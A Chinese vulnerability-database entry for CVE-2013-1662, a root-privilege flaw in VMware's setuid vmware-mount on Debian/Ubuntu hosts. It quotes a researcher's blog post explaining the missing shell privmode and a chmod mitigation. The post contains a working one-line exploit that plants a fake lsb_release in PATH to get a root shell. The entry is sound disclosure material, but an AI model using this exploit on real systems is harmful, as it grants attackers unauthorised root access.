VMware Workstation/VMware Player ‘vmware-mount’组件权限许可和访问控制

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121831 漏洞类型 权限许可和访问控制
发布时间 2013-08-22 更新时间 2013-08-30
CVE编号 CVE-2013-1662 CNNVD-ID CNNVD-201308-384
漏洞平台 Linux CVSS评分 6.9
|漏洞来源
https://www.exploit-db.com/exploits/40169
https://www.securityfocus.com/bid/61966
https://cxsecurity.com/issue/WLB-2013080228
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-384
|漏洞详情
VMwareWorkstation和VMwareWorkstationPlayer都是美国威睿(VMware)公司的虚拟机软件产品。VMwareWorkstation是一套收费且功能丰富的虚拟机软件。VMwareWorkstationPlayer是一套免费开源的且功能较简单的虚拟机软件。基于DebianGNU/Linux系统上的VMwareWorkstation8.x及9.x版本和VMwarePlayer4.x及5.x版本中的vmware-mount组件中存在提权漏洞。攻击者可利用该漏洞获得主机操作系统权限。
|漏洞EXP
// Source: http://blog.cmpxchg8b.com/2013/08/security-debianisms.html

On most modern Linux systems, /bin/sh is provided by bash, which detects that it's being invoked as sh, and attempts to mimic traditional sh. As everyone who works in security quickly learns, bash will drop privileges very early if uid != euid. 

 488
 489   if (running_setuid && privileged_mode == 0)
 490     disable_priv_mode ();
 491

Where disable_priv_mode is defined as:

1202 void
1203 disable_priv_mode ()
1204 {
1205   setuid (current_user.uid);
1206   setgid (current_user.gid);
1207   current_user.euid = current_user.uid;
1208   current_user.egid = current_user.gid;
1209 }

Non-Linux systems tend to use pdksh as /bin/sh, which also supports privmode since version 5.0.5:

 307     /* Turning off -p? */
 308     if (f == FPRIVILEGED && oldval && !newval) {
 309 #ifdef OS2
 310         ;
 311 #else /* OS2 */
 312         setuid(ksheuid = getuid());
 313         setgid(getgid());
 314 #endif /* OS2 */
 315     } else if (f == FPOSIX && newval) {


This is surprisingly effective at mitigating some common vulnerability classes and misconfigurations. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3) calls in setuid executables", see section 7 of the bash NOTES file.

However, this never really happens on Debian derived systems. Debian (and therefore Ubuntu) will use dash by default (see https://wiki.debian.org/DashAsBinSh), or disable it with this patch if you choose to use bash:

http://patch-tracker.debian.org/patch/series/view/bash/4.2+dfsg-0.1/privmode.diff

A nice example of this failing can be observed in the VMware utilities, which try to invoke lsb_release with popen() to learn about the current execution environment. This means you can get a nice easy root shell like this on any Debian/Ubuntu derived system with VMware installed:

$ cc -xc - -olsb_release<<<'main(){system("sh>`tty` 2>&1");}';PATH=.:$PATH vmware-mount
# whoami
root

It looks like Debian originally decided they didn't want privmode because it broke UUCP (!?).

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=52586

VMware do list Debian/Ubuntu as supported host platforms though, so they have published a fix for this issue today. If you care about this and can't wait for the patch, you can temporarily remove the setuid bit from vmware-mount like this:

# chmod u-s /usr/bin/vmware-mount

Note that it is almost impossible to use popen() or system() safely in a setuid program without privmode, even if you specify the full path. This is a fun example from back in 2005, but there are lots more cases.

In conclusion, too bad if an otherwise unexploitable bug becomes exploitable, that's the price you pay for high quality uucp support in 2013 ;-)

P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
P.P.S. I sent the dash maintainers a patch today, but I'm not sure if they're interested.
|受影响的产品
VMWare Workstation 8.0.2 VMWare Workstation 8.0.1 VMWare Player 4.0.2 VMWare Player 4.0.1
|参考资料

来源:www.vmware.com
链接:http://www.vmware.com/security/advisories/VMSA-2013-0010.html
来源:blog.cmpxchg8b.com
链接:http://blog.cmpxchg8b.com/2013/08/security-debianisms.html